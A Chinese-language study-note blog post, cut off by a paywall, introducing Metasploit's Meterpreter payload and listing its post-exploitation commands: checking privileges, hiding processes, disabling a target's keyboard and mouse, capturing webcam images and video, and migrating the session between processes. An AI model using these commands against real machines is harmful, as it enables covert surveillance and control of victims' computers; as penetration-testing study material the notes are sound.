注意:本篇文章仅用于学习笔记记录与交流,不得用于其他违规用途。
一、Meterpreter简介
-
Meterpreter 比系统 shell 更加灵活,功能更加丰富,例如监控主机,监控键盘,开启摄像头,麦克风,还可
以灵活的获取你的操作系统信息。
-
高级,动态,可扩展的 payload,一站式后攻击 payload;
-
基于 meterpreter 上下文利用更多漏洞发起攻击;
-
后渗透测试阶段一站式操作界面;
-
完全基于内存的 DLL 注入式 payload(不写硬盘)
-
注入合法系统进程并建立 stager
-
基于 stager 上传和预加载 DLL 进行扩展模块的注入(客户端 API)
-
基于 stager 建立的 socket 连接建立加密的 TLS/1.0 通信隧道;
-
利用 TLS 隧道进一步加载后续扩展模块(避免网络取证
二、Meterpreter基本命令
1、系统命令
(1)基本系统命令
background #将当前会话放置后台,然后可以再运行其他模块进行提权
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程 kill <PID值> 杀死进程
idletime #查看目标机发呆(无操作)时间
reboot / shutdown #重启/关机
shell #进入目标机cmd shell
(2)uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
(3)webcam摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
(4)执行exe文件
execute -f c:\\111.exe
execute -H -i -f calc.exe
# execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
(5)migrate进程迁移
getpid # 获取当前进程的pid
ps # 查看当前活跃进程
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中,
kill <pid值> 
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
